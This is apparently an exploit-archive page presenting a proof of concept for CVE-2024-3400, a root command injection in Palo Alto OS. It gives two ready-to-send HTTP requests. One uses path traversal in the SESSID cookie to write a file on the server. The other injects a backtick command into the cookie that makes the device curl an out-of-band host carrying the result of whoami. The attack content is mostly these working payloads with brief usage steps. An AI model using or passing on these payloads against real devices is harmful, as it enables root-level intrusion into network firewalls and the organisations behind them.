Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]
- Palo Alto OS Command Injection[6]
- Authored by h4x0r-dz[7] | Site github.com[8]
-
Palo Alto OS was recently hit by a command injection zero day attack. These are exploitation details related to the zero day.
- advisories | CVE-2024-3400[9]
- SHA-256 |
d03a8781f559271cf9b0357b2f4175728dea72a07e8c80018aea6ad57dd5005c
- Download[10] | Favorite[11] | View[12]
Change Mirror[13] Download[14]
# CVE-2024-3400
CVE-2024-3400 Palo Alto OS Command Injection
send this HTTP request:
```http
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/hellome1337.txt;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
```
![image](https://github.com/h4x0r-dz/CVE-2024-3400/assets/26070859/96803de5-1d8c-42ec-b1fc-60e8e4a0a954)
you will create hellome1337.txt file on the server with root access
now if you try to access the files you should receive 403 insted of 404
![image](https://github.com/h4x0r-dz/CVE-2024-3400/assets/26070859/e579d4a6-11a5-4f7c-a3da-ba7b0cfa8a4d)
### Command Injection
```
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.01
Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/minute/h4`curl${IFS}xxxxxxxxxxxxxxxxx.oast.fun?test=$(whoami)`;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
```
More Info :
https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis
https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/
File Tags
- ActiveX[20] (933)
- Advisory[21] (84,795)
- Arbitrary[22] (16,654)
- BBS[23] (2,859)
- Bypass[24] (1,827)
- CGI[25] (1,032)
- Code Execution[26] (7,633)
- Conference[27] (689)
- Cracker[28] (844)
- CSRF[29] (3,373)
- DoS[30] (24,557)
- Encryption[31] (2,383)
- Exploit[32] (52,819)
- File Inclusion[33] (4,253)
- File Upload[34] (986)
- Firewall[35] (822)
- Info Disclosure[36] (2,849)
- Intrusion Detection[37] (906)
- Java[38] (3,118)
- JavaScript[39] (890)
- Kernel[40] (7,015)
- Local[41] (14,713)
- Magazine[42] (586)
- Overflow[43] (13,037)
- Perl[44] (1,430)
- PHP[45] (5,199)
- Proof of Concept[46] (2,368)
- Protocol[47] (3,695)
- Python[48] (1,600)
- Remote[49] (31,423)
- Root[50] (3,618)
- Rootkit[51] (523)
- Ruby[52] (619)
- Scanner[53] (1,650)
- Security Tool[54] (7,980)
- Shell[55] (3,252)
- Shellcode[56] (1,217)
- Sniffer[57] (900)
- Spoof[58] (2,258)
- SQL Injection[59] (16,538)
- TCP[60] (2,423)
- Trojan[61] (689)
- UDP[62] (897)
- Virus[63] (668)
- Vulnerability[64] (32,583)
- Web[65] (9,873)
- Whitepaper[66] (3,773)
- x86[67] (967)
- XSS[68] (18,175)
- Other[69]
File Archives
- April 2024[70]
- March 2024[71]
- February 2024[72]
- January 2024[73]
- December 2023[74]
- November 2023[75]
- October 2023[76]
- September 2023[77]
- August 2023[78]
- July 2023[79]
- June 2023[80]
- May 2023[81]
- Older[82]
Systems
- AIX[83] (429)
- Apple[84] (2,078)
- BSD[85] (376)
- CentOS[86] (58)
- Cisco[87] (1,927)
- Debian[88] (7,011)
- Fedora[89] (1,693)
- FreeBSD[90] (1,246)
- Gentoo[91] (4,467)
- HPUX[92] (880)
- iOS[93] (373)
- iPhone[94] (108)
- IRIX[95] (220)
- Juniper[96] (69)
- Linux[97] (49,194)
- Mac OS X[98] (691)
- Mandriva[99] (3,105)
- NetBSD[100] (256)
- OpenBSD[101] (488)
- RedHat[102] (15,473)
- Slackware[103] (941)
- Solaris[104] (1,611)
- SUSE[105] (1,444)
- Ubuntu[106] (9,437)
- UNIX[107] (9,390)
- UnixWare[108] (187)
- Windows[109] (6,649)
- Other[110]
- Services
- Security Services[121]
- Hosting By
- Rokasec[122]